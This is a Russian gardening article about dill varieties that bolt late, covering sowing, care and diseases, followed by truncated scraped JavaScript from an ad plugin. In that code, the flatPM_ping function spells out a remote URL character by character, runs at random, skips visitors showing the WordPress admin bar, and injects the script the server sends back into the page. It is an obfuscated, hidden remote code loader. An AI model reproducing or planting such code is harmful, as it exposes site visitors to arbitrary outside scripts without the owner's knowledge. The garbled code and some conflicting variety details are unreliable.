На грядках некоторые поздние сорта не успевают за лето полностью вызревать, зато они лучше всего подходят для получения пышной зелени, начиная с весны и до самой осени, особенно при выращивании дома на подоконнике. Некоторые позднеспелые сорта (Буян, Салют, Аллигатор) имеют очень сближенные междоузлия на стебле, от чего внешне напоминают густые кустики, их так и называют – «кустовыми».

У позднеспелых сортов зелень более пахучая, красивая и витаминная

Укроп кустовой замечателен тем, что позволяет весь сезон собирать свежую зелень, не подсевая семена повторно конвейерным способом. Сначала вы используете молодые растения при прореживании всходов, затем обрываете нижний ярус кустиков укропа, выщипываете боковые побеги их пазух листьев, а потом уже собираете всю зелень с растения. Так, для обеспечения одной семьи зеленью укропа на протяжении всего сезона достаточно двадцати растений корневого укропа. Вдобавок, у позднеспелых сортов зелень более пахучая, красивая и витаминная.

Аллигатор

Особо ценится у отечественных огородников укроп Аллигатор, идеально подходящий для получения большого урожая свежей зелени, поскольку его можно выращивать как в теплице, так и в открытом грунте, собирая урожай несколько раз за сезон. На приподнятой розетке формируются зеленые листья с сизоватым оттенком и восковым налетом. Зонтики появляются лишь к концу лета.

Кибрай

Широко распространенный укроп Кибрай привлекателен своими широкими, сильно рассеченными листьями, обладающими ярким ароматом. Розетка у растения крупная, полуприподнятая, достигает в высоту 40 см. Цвет листьев зеленый с чуть желтоватым оттенком и еле заметным восковым налетом. Чтобы Кибрай успел созреть на грядке, его нужно высевать пораньше или выращивать под пленкой.

Голландский сорт, заслуживший популярность во всем мире за пышную ароматную зелень и легкость в выращивании. Укроп Дилл способен расти в любых условиях, зонтик выбрасывает поздно, долго не перерастает и дает большое количество качественной зелени. Растения достигают в высоту 150 см и могут использоваться не только для потребления в пищу в свежем, высушенном виде или в качестве приправы при консервировании, но и в декоративных целях.

Лучшие сорта укропа на зелень без зонтиков для выращивания в теплицах, открытом грунте и домашних условиях

Нежная, ароматная зелень укропа идеальна для салатов и супов, и привлекательно смотрится на тарелке в качестве украшения блюда. Но после появления на кустиках зонтиков, зелень становится жесткой и быстро желтеет. Такой укроп не годится в пищу и подходит только для консервирования.

Решение для тех, кому нужна только зелень без зонтиков — специальные сорта с соответствующими свойствами. Из статьи вы узнаете, что собой представляет сортовой укроп на зелень и какие культуры подходят для выращивания в открытом грунте и теплицах.

Сортовые особенности укропа без зонтиков

Зонтик укропа – это соцветие растения, место образования его семян. Укропа без зонтиков не бывает — такая культура не смогла бы размножаться. Но есть сорта, специально созданные селекционерами «на зелень».

Такие растения остаются сочными и зелеными почти все лето и лишь ближе к осени выпускают свои зонтики с семенами, чтобы в следующем году начать все сначала. Для удобства мы называть сорта укропа с поздним цветением – укропом без зонтиков.

Лучшие сорта укропа без зонтиков

Вы решили вырастить укроп без зонтиков на своем участке, попробуйте посадить сразу несколько разных сортов. Так вы выберете культуру, которая подходит вам по всем параметрам.

Они делятся на раннеспелые, среднеспелые и позднеспелые.

Раннеспелые

Эти растения высевают ранней весной или под зиму. Такие сорта созревают раньше, то есть процесс цветения и стрелкования зонтиками, начинается у них тоже рано. Зато попробовать первую ароматную зелень можно будет уже через месяц.

К раннеспелым сортам относятся:

  1. Зонтик. Лучше растет в условиях повышенной влажности. Для высокого и стабильного урожая советуют подкармливать азотом.
  2. Редут. Лидер по урожайности среди раннеспелых сортов. С каждого кустика можно собрать по 50 г зелени.
  3. Гурман. Отличается поздним стеблеобразованием. Холодостоек. Рекомендуют выращивать в регионах с холодным климатом. Сохраняет все качества при заморозке.
  4. Гренадер. Сильный, стойкий аромат. Быстро отрастает после срезки.
  5. Грибовский. Устойчив к болезням, можно высевать несколько раз за сезон. Подходит как для открытого, так и для закрытого грунта.

Среднеспелые

Созревают на две недели позже раннеспелых, но успевают нарастить гораздо больше зеленой массы, поэтому дают высокий урожай. Считаются самым «ходовым товаром» у огородников. Зонтики формируют на 40-45 день.

Из среднеспелых сортов особо выделяют следующие:

  1. Амазон. Самый урожайный из всех среднеспелых сортов. С одного кустика срезают до 1,4-4,1 кг зелени на кв. м.
  2. Пушок. Новый сорт укропа с поздним стрелкованием. Высокая урожайность, повышенная устойчивость к грибковым заболеваниям и мучнистой росе.
  3. Ришелье. Можно высевать с апреля и до середины августа. Надежно противостоит заболеваниям и вредителям.
  4. Кибрай. Поздно образует зонтики. Невосприимчив к мучнистой росе.

Важно! Чтобы продлить рост зеленой массы укропа, советуют удалять первые соцветия. Тогда зелень можно будет срезать многократно.

Позднеспелые

Период сбора зелени позднеспелых сортов укропа без зонтиков самый продолжительный и обильный. Они лучше всего подходят для зимних заготовок. Хорошо растут в любой почве.

Первая срезка зелени происходит на 55-60 день после всходов. Эти сорта не успевают образовать зонтики в холодных районах нашей страны.

Лучшие позднеспелые сорта:

  1. Салют. Не желтеет. Один куст дает до 95 г зелени. За сезон полностью срезают 3-4 раза.
  2. Буян. Куст объемный по размеру. На 1 кв. м приходится 30 кустиков. Зелень с одного куста может иметь массу до 230 г. Требователен к поливам. Хорошо и долго хранится.
  3. Кустистый. Подходит для открытого грунта, неприхотлив в уходе, зелень долго остается сочной и мягкой.
  4. Озорник. Высокий сорт, достигает 130 см. Высокий процент урожайности.
  5. Аллигатор. Дает до 70 г зелени с куста, долго не уходит в стрелку. Мало восприимчив к болезням.

Какие сорта беззонтичного укропа выбрать

Чтобы понять, какие сорта укропа вам нужны, подумайте, где будет расти ваша зелень? Есть три возможных варианта: открытый грунт, теплица или дома в горшочке на подоконнике.

Для теплицы

Для условий закрытого грунта в основном выбирают те сорта, которые хорошо себя чувствуют при недостаточном освещении, но при этом отличаются быстрым ростом и высокой урожайностью.

К ним относятся:

  1. Иней. Высокий сорт, зелень достигает 170 см в высоту. Зонтики формируются поздно, поэтому срезать можно все лето. С одного куста выходит 35-40 г урожая. Имеет крупную листву и отличается стойким, пряным ароматом.
  2. Амбрелла. Среднеспелый сорт с гигантским ростом. Подходит только для высоких теплиц, так как стебель способен вырасти до 2,5 м в высоту. Созревшую зелень собирают через полтора месяца после посадки и продолжают по мере роста. Урожайность составляет до 25 г с куста. Сорт ценится за ярко-выраженный аромат и хорошую урожайность.
  3. Кибрай. Скороспелый сорт, урожай можно собирать уже через 25 дней после посадки. Листья Кибрая сочные с нежным вкусом, обладает раскидистой, мощной розеткой, его нельзя ограничивать в пространстве. Для лучших результатов сажать этот сорт нужно на расстояние 20 см друг от друга. Обладает повышенной устойчивостью к заболеваниям.
  4. Дилл. Голландской сорт с поздним стеблеванием. Растение высокое. Дает повышенный урожай. Первую зелень срезают уже через 28 дней после всходов.
  5. Борей. Сорт позднеспелый. Высокоурожайный. Отличается тем, что листики долго не желтеют и не вянут. Как и многие тепличные сорта, имеет высокий стебель до 1,5 м.
  6. Дукат. Позднеспелый. Медленный рост стебля позволяет получать стабильный, высокий урожай. Через 35 дней после появления всходов можно собирать листочки и веточки – их срезают несколько раз в течение сезона.

Для открытого грунта

Если вы посадите на грядки несколько сортов укропа с разным сроком созревания, то обеспечите себя зеленью с середины весны и до поздней осени.

Лучшими сортами укропа без зонтиков для открытого грунта считаются:

  1. Лесногородский. Среднеспелый сорт, даже после формирования зонтика его листочки не желтеют. Растение высотой до 1,3 м. Подходит для повторных срезок, неприхотлив к почве.
  2. Макс. Если метровые стебли укропа вам не по вкусу, выбирайте сорт Макс. Это миниатюрный кустик высотой не более 18 см, с маленькими ромбовидными листочками. С каждого можно получить по 45-55 г пряной зелени.
  3. Кутузовский. Крупное, пышное растение, с листиками округлой формы. Имеет терпкий аромат и обладает отличными вкусовыми качествами. Высокоурожайный.
  4. Дальний. Созревает в течение 45 дней, вырастает до 35 см в высоту. Отличительная особенность — повышенная устойчивость к вредителям и основным заболеваниям.

Для подоконника и балкона

Для тех, у кого нет в собственности участка земли, а вырастить свою зелень очень хочется, подходят следующие сорта, способные дать урожай на подоконнике или балконе:

  1. Грибовский. Устойчив к болезням, можно высевать несколько раз за сезон. Отлично приспособлен к комнатным условиям, но нуждается в плодородной почве с достаточным запасом питательных веществ.
  2. Гренадер. Замечательно растет на подоконниках, дает душистую зелень. Именно это сорт укропа без зонтиков домохозяйки чаще всего высеивают в горшочках на балконах. Для получения высокого урожая, требуется обильный полив 2-3 раза в неделю.

Особенности посадки и выращивания

Укроп известен своей неприхотливостью, у многих огородников это растение появляется на участках самосевом, семена не требуют ухода, но и урожай дают небольшой. Для повышения урожайности рекомендуется подкармливать растения комплексным удобрением с повышенным содержанием азота.

Есть еще несколько особенностей, учитывая которые, вы сможете получить в несколько раз больше свежей зелени, чем обычно:

  1. Подготовьте семена к посадке. Для этого положите их во влажную марлю и оставьте в теплом месте на двое суток.
  2. В открытый грунт высаживают в апреле, в прогретую землю. В холодных регионах лучше перенести посев на начало мая. В теплицу можно высевать в любое время при температуре не ниже +10°С.
  3. Бороздки делают на расстоянии 25 см друг от друга, семена обязательно поливают теплой водой и только потом присыпают землей.
  4. Поливают через каждые 2-3 дня, затем рыхлят землю тяпкой и удаляют сорняки.
  5. Когда стебель укропа достигает 5-7 см, делают прореживание — так, чтобы между растениями оставалось около 10 см.
  6. Срезают созревшую зелень аккуратно, стараясь не повредить растение. Осенью кусты удаляют вместе с корешками. Зелень сушат или замораживают.

Внимание! После срезки зелени для ее дальнейшего роста советуют полить и подкормить кустики азотосодержащим удобрением.

Как и многие растения, укроп подвержен некоторым заболеваниям.

Самые распространенные из них:

  1. Фомоз. Грибковое заболевание, при котором на поврежденных участках появляются темные пятна и черные точки, со временем все кусты увядают. От зараженной зелени рекомендуется сразу избавиться, большие участки обрабатывают 1% бордоской жидкостью и повторяют процедуру через две недели. В профилактических целях советуют избегать скученности кустов и переувлажнения почвы.
  2. Церкоспороз. Грибок – предшественник фомоза, на растении появляются продолговатые темно-коричневые пятна. Вылечить болезнь нельзя, зелень, зараженную церкоспорозом, выкапывают и сжигают.
  3. Пероноспороз. Болезнь охватывает верхушки кустов при повышенной влажности и температуре около +20°С. Для борьбы с заболеванием используют измельченный мел или древесную золу, густо посыпают землю и растения.

Заключение

Теперь, зная разнообразные сорта укропа без зонтиков, вы без труда выберете те, которые подходят именно вам, и все лето сможете наслаждаться сочной, пряной зеленью этого замечательного растения.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};